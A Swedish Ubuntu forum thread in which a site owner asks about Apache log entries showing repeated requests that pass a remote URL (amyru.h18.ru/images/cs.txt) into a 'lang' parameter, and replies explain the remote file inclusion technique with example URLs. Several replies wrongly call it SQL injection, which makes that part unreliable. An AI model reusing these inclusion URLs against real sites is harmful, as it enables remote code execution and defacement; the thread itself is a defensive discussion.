Ubuntu Sverige

En normal besökare genererar något i stil med:

58.105.241.234.optusnet.com.au - - [02/Oct/2007:07:20:59 +0200] "GET /index.php?lang=en HTTP/1.1" 200 3766

Ibland får jag mystiska händelser i min loggfil. Vad är det besökaren vill med detta? Idag har jag fått 494 rader med detta, viss variation.

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:37 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:40 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:43 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:46 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:49 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:52 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:55 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

bas5-montreal02-1167962546.dsl.bell.ca - - [02/Oct/2007:01:32:58 +0200] "GET /index.php?lang=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 3798

Det är någon som försöker göra en sql injection. kolla adressen: "http://amyru.h18.ru/images/cs.txt" och koden.

Jag kan ta oc kolla närmare på det efter att jag ätit 

Hm kanske Apache regerar på saker som händer på CS-servern eller var det bara configen? (Kikade bara snabbt)

hmm, varför då "index.php?lang=http://amyru.h18.ru/images/cs.txt" ?
Kan ju vara någon som försökt att hacka, där sätter jag mitt mynt iallafall.

Ser det inte ut som om besökaren försöker hämta filen cs.txt från din server? Men är det en injection? Besökaren verkar komma från Kanada. Jag får upp en sida om jag skriver in http://bell.ca/ i adressfältet.

Jaha, det låter ju tråkigt. Men eftersom jag inte kör någon sql server så är jag säker, eller?

nej, en sql injection beöver inte ha något med mysql att göra, eller det har inte det.

Det utnyttjar hål i en hemsida.
Så att om vi tex säger att det är ett hål på hemsidan.
Den ser ut såhär när man bläddrar mellan olika sidor: <a class="postlink" href="http://www.hemsidan.com/index.php?page= ... ?page=1</a>
Men kolla, då kan det ju vara en möjlighet för en exploit där.

<a class="postlink" href="http://www.hemsidan.com/index.php?page= ... e=</a>[b]1[/b] där.

om vi nu har skadlig kod på, låt oss säga <a class="postlink" href="http://www.skadligsida.com/exploit.txt" ... oit.txt</a>

Om nu hemsidan har ett hål så kan man göra såhär:

"www.hemsidan.com/index.php?page=www.ska ... xploit.txt"

nu så startar all skadbar kod, som tex kan vara skriven i php i "www.hemsidan.com"

Då kan man få upp tex en ftp klient, kommandoskal, wget och allt som hör till, har man en ösäker server som man inte har koll på rättigheterna med så kan man till tom ladda ner virus/rootkits och andra potentiellt skadlig kod, man även gära en "deface" (om det nu heter så, kommer inte ihåg) men det var tydligen den sortens sql som de försökte göra.

Du kan läsa med om sql injections och sånt här http://en.wikipedia.org/wiki/SQL_injection bland annat.

Edit: kan fått det där med sql om bakfoten, men jag tror att jag fått det rätt, så mycket termer å sånt att hålla reda på

Tack, nu förstår jag liter mer.
Men inte trodde jag att det fanns illasinnade människor på internet. 

Det finns det, men det finns ju sånna som är så snälla så att dom hackar ens dator/hemsida, men inte förstör något och säger till vad hålet är

Men man är aldrig säker på nätet, bara så du vet:P

Det händer sällan att det kommer någonting bra från adresser med .ru
http://amyru.h18.ru/

LJ